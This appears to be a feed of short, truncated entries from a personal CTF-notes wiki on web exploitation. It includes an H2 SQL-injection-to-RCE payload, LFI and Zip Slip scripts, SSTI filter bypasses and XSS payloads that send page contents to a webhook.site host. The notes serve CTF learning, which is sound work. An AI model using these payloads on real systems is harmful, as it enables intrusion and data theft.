http://abyss.osorin.net/ 2026-05-01T12:17:15+00:00 http://abyss.osorin.net/ http://abyss.osorin.net/_media/wiki:logo.png text/html 2024-11-01T09:07:49+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/csp-bypass-custom-404?rev=1730452069&do=diff Bypass CSP when a custom 404 page is present With: resp.headers['Content-Security-Policy'] = "script-src 'self'; And a custom 404 page like: @app.errorhandler(404) def page_not_found(error): path = request.path return f"{path} not found" text/html 2024-11-01T09:07:24+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/data-xss?rev=1730452044&do=diff data URI scheme (+ XSS) Lessons learned from Google Capture The Flag 2024: [WEB] sappy On challenges where we need XSS and for example host is checked, we can do the following using data url schema: let url = new URL("data://osorin.net/,<script>alert()</script>"); fetch(url) .then(response => response.text()) .then((response) => { console.log(response) }) .catch(err => console.log(err)); console.log(url.host); text/html 2024-08-21T13:45:42+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/dns-rebinding?rev=1724247942&do=diff On DNS Rebinding Clean enough Write-ups for DNS Rebinding. <https://blog.bi0s.in/2021/12/05/Web/Vulpixelize-HITCONCTF2021/> <https://geleta.eu/2019/my-first-ssrf-using-dns-rebinfing/> Useful tool/service: <https://github.com/taviso/rbndr> text/html 2024-09-01T19:43:19+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/easy-bash-jail?rev=1725219799&do=diff Easy bash jail with strict restrictions #!/usr/local/bin/python3 -u import subprocess import re def restrict_input(command): pattern = re.compile(r'[a-zA-Z*^\,,;\\!@/#?%`"\'&()-+]|[^\x00-\x7F]') if pattern.search(command): raise ValueError("that's not nice!") return command def execute_command(command): safe = restrict_input(command) result = subprocess.run(safe, stdout=True, shell=True) return result.stdout print("Welcome to Baby PyBash!\n") cmd = input("… text/html 2024-11-01T09:07:05+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/express-query-param?rev=1730452025&do=diff Express req.query Notes Notes from HeroCTF 2024 SampleHub [WEB]. Given this code snippet: process.chdir(path.join(__dirname, "samples")); app.get("/download/:file", (req, res) => { const file = path.basename(req.params.file); console.log(typeof req.query.filename); res.download(file, req.query.filename || "sample.png", (err) => { if (err) { res.status(404).send(`File "${file}" not found`); } }); }); text/html 2024-10-07T19:37:53+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/html-parsing-differential?rev=1728329873&do=diff HTML Encoding Differentials Lessons learned from SEKAI CTF 2024: [WEB] htmlsandbox We want to create a parsing differential when the HTML is loaded incrementally (streamed) vs loaded inline (all at once) The <meta> CSP tag should be present in the parsed text/html 2025-02-09T23:04:12+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/http-pipelining?rev=1739142252&do=diff HTTP Pipelining + HTTP/2 Single Packets Lessons learned from LACTF 2025: [WEB] whats-my-number TL;DR: Get enough Math.random values to crack with randcrack (V8). In order to “race” (not really) and get consecutive values, you must send your requests with http pipelining or http/2 single packets. text/html 2024-12-02T22:30:51+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/java-h2-sqli-rce?rev=1733178651&do=diff H2 SQL injection to RCE http://localhost:1338/api/note?name=aa'; CREATE ALIAS BOBOB AS 'String e(String cmd) throws java.io.IOException{ try { java.lang.Runtime rt = java.lang.Runtime.getRuntime(); java.lang.Process proc = rt.exec(cmd); java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(proc.getInputStream())); String line; StringBuilder output = new StringBuilder(); while ((line = reader.readLine… text/html 2024-08-23T02:10:09+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/jinja-ssti?rev=1724379009&do=diff When stuck on jinja/flask SSTI Magic tool: <https://github.com/Marven11/Fenjing> Sample filter bypassed: invalid_chars = ["{{", "}}", ".", "_", "[", "]","\\"] text/html 2024-10-16T00:59:44+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/js-with-strict-waf?rev=1729040384&do=diff TCP1P Multiplication Lessons learned from TCP1P CTF 2024: Multiplication [WEB] <?php error_reporting(0); header("Content-Security-Policy: script-src 'self' 'unsafe-inline';"); $digit = $_GET['digit']; if ((int) $digit) { $forbiddenChars = array('<', '>', '`', '~', '(' , ')', ',', '+', '-', '/', '*', '%', '^', '|', '&', '!', '?', ':', ';', '.'); foreach ($forbiddenChars as $char) { if (strpos($digit, $char) !== false) { http_response… text/html 2024-08-21T14:00:34+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/lfi-proc?rev=1724248834&do=diff LFI using proc. Random fact learned from DownUnder CTF 2024: [WEB] hah got em LFI is possible from context: /proc/self/root file:///proc/7/root/etc/flag.txt text/html 2024-10-07T19:52:38+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/localhost-only-bypass?rev=1728330758&do=diff Headers for localhost bypass Headers worth trying for (probably) unintended bypasses: <https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Forwarded> <https://learn.microsoft.com/en-us/answers/questions/1290318/azure-application-gateway-adds-6-additional-header> <https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-Host> text/html 2024-08-21T13:45:20+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/parse-int?rev=1724247920&do=diff parseInt() in JS Reminder for parseInt() function behavior. parseInt('7/../../something') Results in: 7 text/html 2024-08-21T13:55:57+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/php-mime-spoofing?rev=1724248557&do=diff Mime Spoofing + php Lessons learned from DownUnder CTF 2024: [WEB] sniffy import requests cookies = { 'PHPSESSID': 'abcd' } for i in range(4): r = requests.get('http://localhost:8080/', params={'theme': 'a' * i + 'M.K.' * 300}, cookies=cookies) r = requests.get('http://localhost:8080/audio.php', params={'f': '../../../../tmp/sess_abcd'}) if r.status_code != 403: print('found') print(r.text) text/html 2024-12-09T22:03:00+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/pydantic-jinja-ssti?rev=1733781780&do=diff Pydantic email validator + jinja ssti class EmailModel(BaseModel): email: EmailStr @app.route('/render', methods=['POST']) def render_email(): email = request.form.get('email') try: email_obj = EmailModel(email=email) return Template(email_template%(email)).render() except ValidationError as e: return render_template('mail.html', error="Invalid email format.") text/html 2024-10-07T20:57:31+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/python-format-string?rev=1728334651&do=diff Python format string CONFIG = { 'SECRET_KEY': 'super secret key' } class Event(object): def __init__(self, id, level, message): self.id = id self.level = level self.message = message def format_event(format_string, event): return format_string.format(event=event) text/html 2024-11-14T17:17:23+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/sidebar?rev=1731604643&do=diff CTF notes: * Bypass CSP when a custom 404 page is present * data URI scheme (+ XSS) * Easy bash jail with strict restrictions * Express req.query Notes * H2 SQL injection to RCE * Headers for localhost bypass * HTML Encoding Differentials * HTTP Pipelining + HTTP/2 Single Packets * LFI using proc. * Mime Spoofing + php * On DNS Rebinding * parseInt() in JS * Pydantic email validator + jinja ssti * Python format string * SNI Spoofing * SQLi No Commas * TCP1P Multiplication * Wh… text/html 2024-08-21T13:44:24+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/sni-spoof?rev=1724247864&do=diff SNI Spoofing Lessons learned from CTFZone CTF 2024: [WEB] youtube-unlock SNI, or Server Name Indication, is an addition to the TLS encryption protocol that enables a client device to specify the domain name it is trying to reach in the first step of the TLS handshake, preventing common name mismatch errors. text/html 2025-02-09T23:20:39+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/sqli-no-commas?rev=1739143239&do=diff SQLi No Commas Lessons learned from nullconctf 2025: [WEB] paginator v2 Basically sqli without commas: <https://www.sidechannel.blog/en/sql-injection-there-was-a-comma-halfway/> <https://mindcrafters.xyz/writeups/nullconctf-2025-web/> text/html 2024-11-18T16:23:35+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/start?rev=1731947015&do=diff Wiki under development (possibly forever? :-?) text/html 2024-08-21T13:32:37+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/unsolved?rev=1724247157&do=diff Zip Slip + Absolute Paths Lessons learned from TheHackersCrew CTF 2024: [WEB] niceview1 * Zip Slip is possible with absolute paths (challenge filtered double dots). payload = f""" <%inc #include "{rs}_util.json" %> {{% goflag() %}} """ payload2 = """ #include <fstream> std::string goflag() { std::ifstream fin("/app/flag.txt"); std::string line; std::getline(fin, line); return line; } """ zf = io.BytesIO() with zipfile.ZipFile(zf, 'w') as myzip: myzip.writestr(f'/app… text/html 2025-02-20T01:10:26+00:00 Anonymous (anonymous@undisclosed.example.com) http://abyss.osorin.net/xss-payloads?rev=1740013826&do=diff XSS Payloads LACTF Some payloads from LACTF 2025: [WEB] purell <https://github.com/uclaacm/lactf-archive/blob/main/2025/web/purell/payloads.txt> <script> fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q='+encodeURIComponent(document.body.innerHTML)) </script> <img src=/f onerror=fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q='+encodeURIComponent(document.body.innerHTML))> <SCRIPT> fetch('https://webhook.site/e7abaf6f-b844-49f9-8419-1c0531457027?q='+e…